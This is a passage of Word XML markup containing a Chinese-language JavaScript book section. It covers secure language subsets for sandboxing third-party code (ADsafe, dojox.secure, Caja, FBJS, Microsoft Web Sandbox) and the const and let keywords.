        <w:t>容器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>内定义一个只对外提供安全的标准</w:t>
      </w:r>
      <w:r>
        <w:t>DOM API</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>外观面板</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>facade</w:t>
      </w:r>
      <w:r>
        <w:t>）或</w:t>
      </w:r>
      <w:r>
        <w:t>“document</w:t>
      </w:r>
      <w:r>
        <w:t>代理对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>proxy</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>禁止使用某些属性和方法，以免在沙箱中的代码拥有</w:t>
      </w:r>
      <w:r>
        <w:t>过多的权限。这些属性和方法包括</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象的两个属性</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:t>（甚至在某些子集中干脆禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象）、函数的</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，以及</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>两个属性。非标准的属性也被禁止掉了，比如</w:t>
      </w:r>
      <w:r>
        <w:t>__proto__</w:t>
      </w:r>
      <w:r>
        <w:t>。一些子集将这些不安全的属性和全局对象列进黑名单，还有一些子集提供了白名单，给出了推荐使用的安全的属性和方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>静态分析可以有效地防止带有点（</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>）运算符的属性存取表达式去读写特殊属性。但使用方括号</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>来访问属性则与此不同，</w:t>
      </w:r>
      <w:r>
        <w:t>因为我们无法对方括号内的字符串表达式做静态分析。基于这个原因，安全子集通常禁止使用方括号，除非方括号内是一个数字或字符串</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>直接量。安全子集将</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>替换为全局函数，通过调用全局函数来查询和设置对象属性，这些函数会执行运行时检查以确保它们不会读写那些禁止访问的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有一些限制，比如禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句，并不会给程序员带来额外负担，毕竟这些特性本来就很少在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编程中用到。另外一些限制规则，比如使用方括号对属性进行存取的限制则对开发造成诸多不便，这时就有代码转换器的用武之地了。比如，转换</w:t>
      </w:r>
      <w:r>
        <w:t>器会自动将使用方括号的代码转换为函数调用的代码，以便能够对它执行运行时检查。有了这种代码转换，可以安全地使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字。当然，沙箱代码的运行时安全性检查和执行速度之间是一对矛盾，这里的代码转换只是一种权衡后的折中方案。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有一些安全子集已经实现了，对这个子集更详尽地介绍超出了本书的范围，这里我们只是简要地介绍一些比较重要的实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ADsafe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ADsafe</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://adsafe.org</w:t>
      </w:r>
      <w:r>
        <w:t>）是第一个正式提出的安全子集。它的提出者是</w:t>
      </w:r>
      <w:r>
        <w:t>Douglas Crockford</w:t>
      </w:r>
      <w:r>
        <w:t>（他也定义了</w:t>
      </w:r>
      <w:r>
        <w:t>The Good Parts</w:t>
      </w:r>
      <w:r>
        <w:t>子集）。</w:t>
      </w:r>
      <w:r>
        <w:t>ADsafe</w:t>
      </w:r>
      <w:r>
        <w:t>只包含静态检查，它使用</w:t>
      </w:r>
      <w:r>
        <w:t>JSLint</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://jslint.org</w:t>
      </w:r>
      <w:r>
        <w:t>）作为检验器。这个工具禁止访问大部分的全局变量，并定义了</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>ADSAFE</w:t>
      </w:r>
      <w:r>
        <w:t>变量，它提供了一组可以安全使用的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，包括一些特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t>ADsafe</w:t>
      </w:r>
      <w:r>
        <w:t>并未广泛使用，但它作为一个颇具影响力的概念原型对其他安全子集有着深远的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>dojox.secure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>受</w:t>
      </w:r>
      <w:r>
        <w:t>ADsafe</w:t>
      </w:r>
      <w:r>
        <w:t>的启发，</w:t>
      </w:r>
      <w:r>
        <w:t>Dojo</w:t>
      </w:r>
      <w:r>
        <w:t>工具包（</w:t>
      </w:r>
      <w:r>
        <w:t>http://dojotoolkit.org</w:t>
      </w:r>
      <w:r>
        <w:t>）发布了一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>dojox.secure</w:t>
      </w:r>
      <w:r>
        <w:t>的子集扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>）。和</w:t>
      </w:r>
      <w:r>
        <w:t>ADsafe</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>doj</w:t>
      </w:r>
      <w:r>
        <w:t>ox.secure</w:t>
      </w:r>
      <w:r>
        <w:t>也是基于静态检查，静态检查受限于语言子集范围内。但它和</w:t>
      </w:r>
      <w:r>
        <w:t>ADsafe</w:t>
      </w:r>
      <w:r>
        <w:t>又不尽相同，它允许使用标准</w:t>
      </w:r>
      <w:r>
        <w:t>DOM API</w:t>
      </w:r>
      <w:r>
        <w:t>。同时，它包含一个用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现的检查器。因此我们可以用它对不可信的第三方代码执行运行时前的动态检查。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Caja</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Caja</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>发布的开源安全子集。</w:t>
      </w:r>
      <w:r>
        <w:t>Caja</w:t>
      </w:r>
      <w:r>
        <w:t>定义了两个语言子集。</w:t>
      </w:r>
      <w:r>
        <w:t>Cajita</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>小沙盒</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）是一个与</w:t>
      </w:r>
      <w:r>
        <w:t>ADsafe</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>dojox.secure</w:t>
      </w:r>
      <w:r>
        <w:t>类似的严格子集。</w:t>
      </w:r>
      <w:r>
        <w:t>Valija</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>手提箱</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>行李箱</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）则是一个范围更广的语言子集，更接近于</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的严格模式（不包含</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>Caja</w:t>
      </w:r>
      <w:r>
        <w:t>本身也是一个编译器的名字，这个编译器可以将一段网页内容（</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码）转换为一个安全的模块，这个模</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>块可以放心地驻留在页面中而不会对整个页面或页面上的其他模块产生影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Caja</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>OpenSocial API</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分（关于</w:t>
      </w:r>
      <w:r>
        <w:t>OpenSocial API</w:t>
      </w:r>
      <w:r>
        <w:t>的更多内容请参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/apis/opensocial/</w:t>
      </w:r>
      <w:r>
        <w:t>）。比如，在门户页面</w:t>
      </w:r>
      <w:r>
        <w:t>http://my.yahoo.com</w:t>
      </w:r>
      <w:r>
        <w:t>中就可以看到，所有的模块都遵照</w:t>
      </w:r>
      <w:r>
        <w:t>Caja</w:t>
      </w:r>
      <w:r>
        <w:t>规范。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FBJS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FBJS</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言的变种，这种语言被</w:t>
      </w:r>
      <w:r>
        <w:t>Facebook</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://facebook.com</w:t>
      </w:r>
      <w:r>
        <w:t>）采用，用以在用户个人资料页嵌入不可信的第三方代码。</w:t>
      </w:r>
      <w:r>
        <w:t>FBJS</w:t>
      </w:r>
      <w:r>
        <w:t>依赖代码转换来保证代码的安全性，转换器同样提供运行时检查，以避免通过</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字去访问全局对象，并且对所有的顶层标识符进行重命名，给它们增加了一个标识模块的前缀，正是因为这种重命名，任何对全局变量以及其他模块的成员变量的设置或者查询操作都无法正常进行了。此外，任何对</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>的调用也会因为</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>函数名被重新命名而无法执</w:t>
      </w:r>
      <w:r>
        <w:t>行。</w:t>
      </w:r>
      <w:r>
        <w:t>FBJS</w:t>
      </w:r>
      <w:r>
        <w:t>模拟实现了</w:t>
      </w:r>
      <w:r>
        <w:t>DOM API</w:t>
      </w:r>
      <w:r>
        <w:t>的一个安全子集。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft Web Sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>微软的</w:t>
      </w:r>
      <w:r>
        <w:t>Web Sandbox</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://websandbox.livelabs.com/</w:t>
      </w:r>
      <w:r>
        <w:t>）定义了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的一个更宽泛的子集，包含</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>，它的代码重写规则非常激进，有效地重新实现了一个安全的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>虚拟机，针对不安全的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>顶层代码进行处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="282" w:name="11_2_Chang_Liang_He_Ju_Bu_Bian_Liang_"/>
      <w:r>
        <w:t>11.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　常量和局部变量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="282"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对语言子集的讨论暂告一段落，下面开始讨论语言的扩展。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:t>及后续版本中可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来定义常量。常量可以看成不可重复赋值的变量（对常量重新赋值会失败但不报错），对常量的重复声明会报错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>const pi=3.14;//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个常量并赋值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pi=4;//</w:t>
      </w:r>
      <w:r>
        <w:t>任何对这个常量的重新赋值都被忽略</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>const pi=4;//</w:t>
      </w:r>
      <w:r>
        <w:t>重新声明常量会报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pi=4;//</w:t>
      </w:r>
      <w:r>
        <w:t>这里也会报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:t>和关键字</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>的行为非常类似，由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中没有块级作用域，因此常量会被提前至函数定义的顶部（参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一直以来，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的变</w:t>
      </w:r>
      <w:r>
        <w:t>量缺少块级作用域的支持被普遍认为是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的短板，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>针对这个缺陷增加了关</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>键字</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>。关键字</w:t>
      </w:r>
      <w:r>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:t>一直都是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的保留字（没有使用），因此现有的代码不必作任何改动就可以增加常量，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>并不是保留字，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>及以后的版本才能识别，需要手动加入版本号才可以。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>版本号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章所有提到</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>版本号的地方，都专指</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>的语言版本，在</w:t>
      </w:r>
      <w:r>
        <w:t>Spidermonkey</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>解析器和</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏</w:t>
      </w:r>
      <w:r>
        <w:t>览器中实现了这些语言版本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有一些语言的扩展定义了新的关键字（比如</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>），为了让现有代码不破坏原有结构就能使用这些关键字，则需要显式指明新的语言版本以便使用新版本的语言扩展。如果你正在使用</w:t>
      </w:r>
      <w:r>
        <w:t>Spidermonkey</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>作为单独的解析器，就可以通过命令行选项指定语言版本，或者通过调用一个内置函数</w:t>
      </w:r>
      <w:r>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t>来指定版本（显式指定的版本号是实际版本号乘以</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>的数值，要想激活</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>版本则需要传入</w:t>
      </w:r>
      <w:r>
        <w:t>170</w:t>
      </w:r>
      <w:r>
        <w:t>并启用</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>关键字）。在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中，则可以在</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>标签中指定</w:t>
      </w:r>
      <w:r>
        <w:t>语言的扩展版本，就像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script type="application/javascript;version=1.8"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种使用方式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以作为变量声明，和</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>一样；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环中，作为</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>的替代方案；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在语句块中定义一个新变量并显式指定它的作用域；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个在表达式内部作用域中的变量，这个变量只在表达式内可用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>最简单的方式就是批量替换程序中的</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>。通过</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
